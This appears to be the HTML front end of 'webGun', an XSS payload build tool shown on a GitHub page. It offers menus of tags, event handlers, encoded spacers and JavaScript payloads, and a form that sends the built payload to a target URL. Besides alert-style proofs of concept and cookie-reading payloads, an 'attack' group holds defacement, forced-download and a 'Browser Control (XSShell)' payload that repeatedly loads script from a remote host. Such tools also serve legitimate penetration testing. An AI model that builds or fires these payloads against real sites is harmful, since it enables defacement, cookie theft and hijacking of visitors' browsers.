-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathwebgun.html
89 lines (73 loc) · 23.1 KB
/
webgun.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
<html>
<head>
<meta charset="utf-8">
<meta name="Description" CONTENT="Author: Brute Logic @brutelogic">
<title>webGun - XSS Payload Build Tool</title>
<link rel="stylesheet" href="css/backgrounds.css">
<link rel="stylesheet" href="css/default.css">
<link rel="shortcut icon" href="img/webgun.ico">
</head>
<body>
<label id="z"><div id="x"></div></label> -->
<br>
<form id="form0" name="form0" class="visible" method="POST" action="">
<label class="radio1" title="Filters event handlers by browser.">
<input type="radio" name="browser" value="agnostic" onclick="showFilterBrowser(this.value)">Agnostic
<input type="radio" name="browser" value="ie" onclick="showFilterBrowser(this.value)">IE
<input type="radio" name="browser" value="firefox" onclick="showFilterBrowser(this.value)">Firefox
<input type="radio" name="browser" value="opera" onclick="showFilterBrowser(this.value)">Opera
<input type="radio" name="browser" value="safari" onclick="showFilterBrowser(this.value)">Safari
<input type="radio" name="browser" value="chrome" onclick="showFilterBrowser(this.value)">Chrome
<br>
<br>
</label>
<label class="radio2" title="Shows tags based on events or vice-versa.">
<input type="radio" name="filter" value="tag" onclick="changeFilter(this.value)" checked>Event Oriented
<input type="radio" name="filter" value="handler" onclick="changeFilter(this.value)">Tag Oriented
</label>
<br>
<br>
<select id="extras1" name="extra1"><option value="">Extra 1</option><option value='<form>'><form></option><option value='<frameset>'><frameset></option><option value='<table>'><table></option><option value='<x contextmenu=y>'><x contextmenu=y></option><option value='<x contextmenu=">">'><x contextmenu=">"></option></select><b class="signs"><</b><select id="tags" name="tag" onchange="" required><option value="">Tag</option><optgroup label="1 chars"><option value='a'>a</option><option value='b'>b</option><option value='i'>i</option><option value='p'>p</option><option value='q'>q</option><option value='s'>s</option><option value='u'>u</option><optgroup label="2 chars"><option value='br'>br</option><option value='dd'>dd</option><option value='dl'>dl</option><option value='dt'>dt</option><option value='em'>em</option><option value='h1'>h1</option><option value='h2'>h2</option><option value='h3'>h3</option><option value='h4'>h4</option><option value='h5'>h5</option><option value='h6'>h6</option><option value='hr'>hr</option><option value='li'>li</option><option value='ol'>ol</option><option value='rp'>rp</option><option value='rt'>rt</option><option value='td'>td</option><option value='th'>th</option><option value='tr'>tr</option><option value='tt'>tt</option><option value='ul'>ul</option><optgroup label="3 chars"><option value='bdi'>bdi</option><option value='bdo'>bdo</option><option value='big'>big</option><option value='col'>col</option><option value='del'>del</option><option value='dfn'>dfn</option><option value='dir'>dir</option><option value='div'>div</option><option value='img'>img</option><option value='ins'>ins</option><option value='kbd'>kbd</option><option value='map'>map</option><option value='nav'>nav</option><option value='pre'>pre</option><option value='sub'>sub</option><option value='sup'>sup</option><option value='svg'>svg</option><option value='var'>var</option><option value='wbr'>wbr</option><option value='xmp'>xmp</option><optgroup label="4 chars"><option value='abbr'>abbr</option><option value='area'>area</option><option value='base'>base</option><option value='body'>body</option><option value='cite'>cite</option><option value='code'>code</option><option value='font'>font</option><option value='form'>form</option><option value='head'>head</option><option value='html'>html</option><option value='link'>link</option><option value='main'>main</option><option value='mark'>mark</option><option value='menu'>menu</option><option value='meta'>meta</option><option value='ruby'>ruby</option><option value='samp'>samp</option><option value='span'>span</option><option value='time'>time</option><optgroup label="5 chars"><option value='aside'>aside</option><option value='audio'>audio</option><option value='embed'>embed</option><option value='frame'>frame</option><option value='image'>image</option><option value='input'>input</option><option value='label'>label</option><option value='meter'>meter</option><option value='param'>param</option><option value='small'>small</option><option value='style'>style</option><option value='table'>table</option><option value='tbody'>tbody</option><option value='tfoot'>tfoot</option><option value='thead'>thead</option><option value='title'>title</option><option value='track'>track</option><option value='video'>video</option><optgroup label="6 chars"><option value='applet'>applet</option><option value='button'>button</option><option value='canvas'>canvas</option><option value='center'>center</option><option value='dialog'>dialog</option><option value='figure'>figure</option><option value='footer'>footer</option><option value='header'>header</option><option value='iframe'>iframe</option><option value='keygen'>keygen</option><option value='legend'>legend</option><option value='object'>object</option><option value='option'>option</option><option value='output'>output</option><option value='script'>script</option><option value='select'>select</option><option value='source'>source</option><option value='strike'>strike</option><option value='strong'>strong</option><optgroup label="7 chars"><option value='acronym'>acronym</option><option value='address'>address</option><option value='article'>article</option><option value='caption'>caption</option><option value='details'>details</option><option value='isindex'>isindex</option><option value='listing'>listing</option><option value='marquee'>marquee</option><option value='section'>section</option><option value='summary'>summary</option><optgroup label="8 chars"><option value='basefont'>basefont</option><option value='colgroup'>colgroup</option><option value='datalist'>datalist</option><option value='fieldset'>fieldset</option><option value='frameset'>frameset</option><option value='menuitem'>menuitem</option><option value='noframes'>noframes</option><option value='noscript'>noscript</option><option value='optgroup'>optgroup</option><option value='progress'>progress</option><option value='textarea'>textarea</option><optgroup label="9 chars"><option value='plaintext'>plaintext</option><optgroup label="10 chars"><option value='blockquote'>blockquote</option><option value='figcaption'>figcaption</option></select><select id="s1" name="s1" title="Spacer #1"><option value=''></option><option value='/'>/</option><option value='+'>+</option><option value='%09'>%09</option><option value='%0A'>%0A</option><option value='%0C'>%0C</option><option value='%0D'>%0D</option><option value='%20'>%20</option><option value='%2F'>%2F</option></select><select id="extras2" name="extra2"><option value="">Extra 2</option><optgroup label="auxiliary"><option value='src'>src</option><option value='src=g'>src=g</option><option value='src="g"'>src="g"</option><option value='autofocus'>autofocus</option><option value='poster'>poster</option><option value='style=font-size:700px'>style=font-size:700px</option><option value='style="font-size:700px"'>style="font-size:700px"</option><option value='style=overflow:auto;height:1000px'>style=overflow:auto;height:1000px</option><option value='style="overflow:auto;height:1000px"'>style="overflow:auto;height:1000px"</option><option value='draggable'>draggable</option><option value='contenteditable'>contenteditable</option><option value='required'>required</option><option value='controls'>controls</option><option value='value=aaaaaaaaa'>value=aaaaaaaaa</option><option value='value="aaaaaaaaa"'>value="aaaaaaaaa"</option><option value='loop=1 width=0'>loop=1 width=0</option><option value='type=image'>type=image</option><option value='type="image"'>type="image"</option><optgroup label="obfuscation"><option value='<'><</option><option value='x=""'>x=""</option><option value='on=""'>on=""</option><option value='id=y'>id=y</option><option value='id="y"'>id="y"</option><option value='id=">"'>id=">"</option><option value='id=">"<'>id=">"<</option><option value='x=">"'>x=">"</option><option value='x=">"<'>x=">"<</option><option value='id=alert'>id=alert</option><option value='id="alert"'>id="alert"</option><option value='123456789'>123456789</option></select><select id="s2" name="s2" title="Spacer #2"><option value=''></option><option value='/'>/</option><option value='+'>+</option><option value='%09'>%09</option><option value='%0A'>%0A</option><option value='%0C'>%0C</option><option value='%0D'>%0D</option><option value='%20'>%20</option><option value='%2F'>%2F</option></select><select id="handlers" name="handler" onchange="showTag(this.value)" required><option value="">Event</option><optgroup label="5 chars"><option value='oncut'>oncut</option><optgroup label="6 chars"><option value='onblur'>onblur</option><option value='oncopy'>oncopy</option><option value='ondrag'>ondrag</option><option value='ondrop'>ondrop</option><option value='onhelp'>onhelp</option><option value='onload'>onload</option><option value='onplay'>onplay</option><option value='onshow'>onshow</option><optgroup label="7 chars"><option value='onabort'>onabort</option><option value='onclick'>onclick</option><option value='onclose'>onclose</option><option value='onended'>onended</option><option value='onerror'>onerror</option><option value='onfocus'>onfocus</option><option value='oninput'>oninput</option><option value='onkeyup'>onkeyup</option><option value='onpaste'>onpaste</option><option value='onpause'>onpause</option><option value='onreset'>onreset</option><option value='onwheel'>onwheel</option><optgroup label="8 chars"><option value='onbounce'>onbounce</option><option value='oncancel'>oncancel</option><option value='onchange'>onchange</option><option value='onfinish'>onfinish</option><option value='ononline'>ononline</option><option value='onresize'>onresize</option><option value='onscroll'>onscroll</option><option value='onsearch'>onsearch</option><option value='onseeked'>onseeked</option><option value='onselect'>onselect</option><option value='onsubmit'>onsubmit</option><option value='ontoggle'>ontoggle</option><option value='onunload'>onunload</option><optgroup label="9 chars"><option value='oncanplay'>oncanplay</option><option value='ondragend'>ondragend</option><option value='onemptied'>onemptied</option><option value='onfocusin'>onfocusin</option><option value='oninvalid'>oninvalid</option><option value='onkeydown'>onkeydown</option><option value='onmessage'>onmessage</option><option value='onmouseup'>onmouseup</option><option value='onoffline'>onoffline</option><option value='onplaying'>onplaying</option><option value='onseeking'>onseeking</option><option value='onstalled'>onstalled</option><option value='onstorage'>onstorage</option><option value='onsuspend'>onsuspend</option><option value='onwaiting'>onwaiting</option><optgroup label="10 chars"><option value='onactivate'>onactivate</option><option value='ondblclick'>ondblclick</option><option value='ondragover'>ondragover</option><option value='onfocusout'>onfocusout</option><option value='onkeypress'>onkeypress</option><option value='onmouseout'>onmouseout</option><option value='onpagehide'>onpagehide</option><option value='onpageshow'>onpageshow</option><option value='onpopstate'>onpopstate</option><option value='onprogress'>onprogress</option><option value='ontouchend'>ontouchend</option><optgroup label="11 chars"><option value='onbeforecut'>onbeforecut</option><option value='oncuechange'>oncuechange</option><option value='ondragenter'>ondragenter</option><option value='ondragleave'>ondragleave</option><option value='ondragstart'>ondragstart</option><option value='onloadstart'>onloadstart</option><option value='onmousedown'>onmousedown</option><option value='onmousemove'>onmousemove</option><option value='onmouseover'>onmouseover</option><option value='ontouchmove'>ontouchmove</option><optgroup label="12 chars"><option value='onafterprint'>onafterprint</option><option value='onbeforecopy'>onbeforecopy</option><option value='ongestureend'>ongestureend</option><option value='onhashchange'>onhashchange</option><option value='onloadeddata'>onloadeddata</option><option value='onmouseenter'>onmouseenter</option><option value='onmouseleave'>onmouseleave</option><option value='onmousewheel'>onmousewheel</option><option value='onratechange'>onratechange</option><option value='ontimeupdate'>ontimeupdate</option><option value='ontouchstart'>ontouchstart</option><optgroup label="13 chars"><option value='onafterupdate'>onafterupdate</option><option value='onbeforepaste'>onbeforepaste</option><option value='onbeforeprint'>onbeforeprint</option><option value='oncontextmenu'>oncontextmenu</option><option value='ondevicelight'>ondevicelight</option><option value='onmspointerup'>onmspointerup</option><option value='ontouchcancel'>ontouchcancel</option><optgroup label="14 chars"><option value='onanimationend'>onanimationend</option><option value='onautocomplete'>onautocomplete</option><option value='onbeforeunload'>onbeforeunload</option><option value='onbeforeupdate'>onbeforeupdate</option><option value='ondevicemotion'>ondevicemotion</option><option value='ongesturestart'>ongesturestart</option><option value='onmsgestureend'>onmsgestureend</option><option value='onmsgesturetap'>onmsgesturetap</option><option value='onmspointerout'>onmspointerout</option><option value='onvolumechange'>onvolumechange</option><optgroup label="15 chars"><option value='oncontrolselect'>oncontrolselect</option><option value='ongesturechange'>ongesturechange</option><option value='onmsgesturehold'>onmsgesturehold</option><option value='onmspointerdown'>onmspointerdown</option><option value='onmspointermove'>onmspointermove</option><option value='onmspointerover'>onmspointerover</option><option value='ontransitionend'>ontransitionend</option><option value='onuserproximity'>onuserproximity</option><optgroup label="16 chars"><option value='onanimationstart'>onanimationstart</option><option value='onbeforeactivate'>onbeforeactivate</option><option value='oncanplaythrough'>oncanplaythrough</option><option value='ondurationchange'>ondurationchange</option><option value='onlanguagechange'>onlanguagechange</option><option value='onloadedmetadata'>onloadedmetadata</option><option value='onmsgesturestart'>onmsgesturestart</option><option value='onmsinertiastart'>onmsinertiastart</option><option value='onmspointerenter'>onmspointerenter</option><option value='onmspointerhover'>onmspointerhover</option><option value='onmspointerleave'>onmspointerleave</option><optgroup label="17 chars"><option value='onbeforeeditfocus'>onbeforeeditfocus</option><option value='ondeviceproximity'>ondeviceproximity</option><option value='onmsgesturechange'>onmsgesturechange</option><option value='onmspointercancel'>onmspointercancel</option><optgroup label="18 chars"><option value='onbeforedeactivate'>onbeforedeactivate</option><option value='onreadystatechange'>onreadystatechange</option><optgroup label="19 chars"><option value='onautocompleteerror'>onautocompleteerror</option><option value='ondeviceorientation'>ondeviceorientation</option><option value='onorientationchange'>onorientationchange</option><optgroup label="20 chars"><option value='onanimationiteration'>onanimationiteration</option><option value='onmozfullscreenerror'>onmozfullscreenerror</option><option value='onmsgesturedoubletap'>onmsgesturedoubletap</option><option value='onwebkitanimationend'>onwebkitanimationend</option><option value='onwebkitmouseforceup'>onwebkitmouseforceup</option><optgroup label="21 chars"><option value='onmozfullscreenchange'>onmozfullscreenchange</option><option value='onmozpointerlockerror'>onmozpointerlockerror</option><option value='onwebkittransitionend'>onwebkittransitionend</option><optgroup label="22 chars"><option value='onmozpointerlockchange'>onmozpointerlockchange</option><option value='onwebkitanimationstart'>onwebkitanimationstart</option><option value='onwebkitmouseforcedown'>onwebkitmouseforcedown</option><optgroup label="24 chars"><option value='onwebkitwillrevealbottom'>onwebkitwillrevealbottom</option><optgroup label="25 chars"><option value='oncompassneedscalibration'>oncompassneedscalibration</option><option value='onwebkitmouseforcechanged'>onwebkitmouseforcechanged</option><optgroup label="26 chars"><option value='onwebkitanimationiteration'>onwebkitanimationiteration</option><optgroup label="27 chars"><option value='onwebkitmouseforcewillbegin'>onwebkitmouseforcewillbegin</option></select><select id="s3" name="s3" title="Spacer #3"><option value=''></option><option value='+'>+</option><option value='%09'>%09</option><option value='%0A'>%0A</option><option value='%0C'>%0C</option><option value='%0D'>%0D</option><option value='%20'>%20</option></select><b class="signs">=</b><br><select id="s4" name="s4" title="Spacer #4"><option value=''></option><option value='+'>+</option><option value='%09'>%09</option><option value='%0A'>%0A</option><option value='%0B'>%0B</option><option value='%0C'>%0C</option><option value='%0D'>%0D</option><option value='%20'>%20</option></select><select id="js" name="js" required><option value="">Javascript</option><optgroup label="poc"><option value='alert(1)'>Alert - Simple</option><option value='prompt(1)'>Prompt - Simple</option><option value='confirm(1)'>Confirm - Simple</option><option value='write(1)'>Write - Simple</option><option value='open()'>Open - Simple</option><option value='$=alert,$(1)'>Alert - Simple Split (var $)</option><option value='$=prompt,$(1)'>Prompt - Simple Split (var $)</option><option value='$=confirm,$(1)'>Confirm - Simple Split (var $)</option><option value='$=write,$(1)'>Write - Simple Split (var $)</option><option value='$=open,open()'>Open - Simple Split (var $)</option><option value='_=alert,_(1)'>Alert - Simple Split (var _)</option><option value='_=prompt,_(1)'>Prompt - Simple Split (var _)</option><option value='_=confirm,_(1)'>Confirm - Simple Split (var _)</option><option value='_=write,_(1)'>Write - Simple Split (var _)</option><option value='_=open,_()'>Open Simple - Split (var _)</option><option value='q=alert,q(1)'>Alert - Simple Split (var q)</option><option value='q=prompt,q(1)'>Prompt - Simple Split (var q)</option><option value='q=confirm,q(1)'>Confirm - Simple Split (var q)</option><option value='q=write,q(1)'>Write - Simple Split (var q)</option><option value='q=open,q()'>Open - Simple Split (var q)</option><option value='1?alert(1):0'>Alert - Conditional True</option><option value='1?prompt(1):0'>Prompt - Conditional True</option><option value='1?confirm(1):0'>Confirm - Conditional True</option><option value='1?write(1):0'>Write - Conditional True</option><option value='1?open():0'>Open - Conditional True</option><option value='0?1:alert(1)'>Alert - Conditional False</option><option value='0?1:prompt(1)'>Prompt - Conditional False</option><option value='0?1:confirm(1)'>Confirm - Conditional False</option><option value='0?1:write(1)'>Write - Conditional False</option><option value='0?1:open()'>Open - Conditional False</option><option value='alert(document.cookie)'>Alert - Simple (Cookie)</option><option value='prompt(document.cookie)'>Prompt - Simple (Cookie)</option><option value='confirm(document.cookie)'>Confirm - Simple (Cookie)</option><option value='write(document.cookie)'>Write - Simple (Cookie)</option><option value='open("//google.com")'>Open - Simple (Google)</option><optgroup label="attack"><option value='document.body.innerHTML="<img/src=//brutelogic.com.br/webgun/img/hacked1.jpg%26gt;"'>Defacement - Hacked 1</option><option value='setInterval(function(){with(document)body.appendChild(createElement("script")).src="//0.0.0.0:2255"},0)'>Browser Control (XSShell)</option><option value='d=document;a=d.createElement("a");a.href="img/hacked1.jpg";a.download="open.me";d.body.appendChild(a);a.click()'>Force Download</option></select><select id="s5" name="s5" title="Spacer #5"><option value=''></option><option value='+'>+</option><option value='%09'>%09</option><option value='%0A'>%0A</option><option value='%0C'>%0C</option><option value='%0D'>%0D</option><option value='%20'>%20</option></select><b class="signs">></b><select id="extras3" name="extra3"><option value="">Extra 3</option><option value='#x'>#x</option><option value='AAAAAAAAA'>AAAAAAAAA</option><option value='<td>AAAAAAAAA'><td>AAAAAAAAA</option><option value='<th>AAAAAAAAA'><th>AAAAAAAAA</option><option value='<input type=reset>'><input type=reset></option><option value='<input type=submit>'><input type=submit></option><option value='<option>1<option>2'><option>1<option>2</option><option value='<option><input type=submit>'><option><input type=submit></option><option value='click this!'>click this!</option><option value='hover this!'>hover this!</option><option value='double click this!'>double click this!</option><option value='right click this!'>right click this!</option><option value='cut this!'>cut this!</option><option value='copy this!'>copy this!</option><option value='paste here!'>paste here!</option><option value='resize this!'>resize this!</option><option value='input here!'>input here!</option><option value='play this!'>play this!</option><option value='pause this!'>pause this!</option><option value='select it!'>select it!</option><option value='mark this!'>mark this!</option></select> <br>
<br>
<input type="submit" id="build" class="visible" value="Build" title="Build the payload.">
</form>
<button id="previous" class="" onclick="previousPage()" title="Back to payload edition.">Back</button>
<button id="next" class="visible" onclick="nextPage()" title="Confirms the payload.">Load</button>
<form method="POST" action="">
<textarea name="edited" id="payload" class="visible" onblur="document.forms[1].submit()" title="The payload (editable).">
<svg/onload=alert(1)>
</textarea>
</form>
<form id="form2" name="form2" class="" method="POST" action="">
<br>
<div id="targetbox">
<br>
<label class="radio1" title="Breaks the source code for payload injection.">
<b>
<input type="radio" name="injector" value="">" checked> ">
<input type="radio" name="injector" value="'>"> '>
<input type="radio" name="injector" value=">"> >
<input type="radio" name="injector" value=""> none
</b>
</label>
<br>
<br>
<div class="title">Target</div>
<input type="hidden" name="keep" value="0">
<input type="checkbox" name="keep" value="1" title="Keeps the target for faster retry.">
<span class="info" title="Keeps the target for faster retry.">keep it</span>
<br>
<br>
<b class="info">Place the payload in target with |xss| <br> or leave it blank for test page.</b>
<br>
<br>
<input type="url" id="target" name="target" size="35" class="" value="" placeholder="http://domain/page?p=|xss|" title="The URL of the vulnerable page with |xss|.">
<input type="hidden" id="xss" name="xss" value="<svg/onload=alert(1)>">
</div>
<br>
</form>
<button class="" id="open" title="Opens the target URL with the payload." onclick="document.forms[2].submit()">Shoot!</button>
<script src="js/functions.js"></script>
<script src="js/backgrounds.js"></script>
</body>
</html>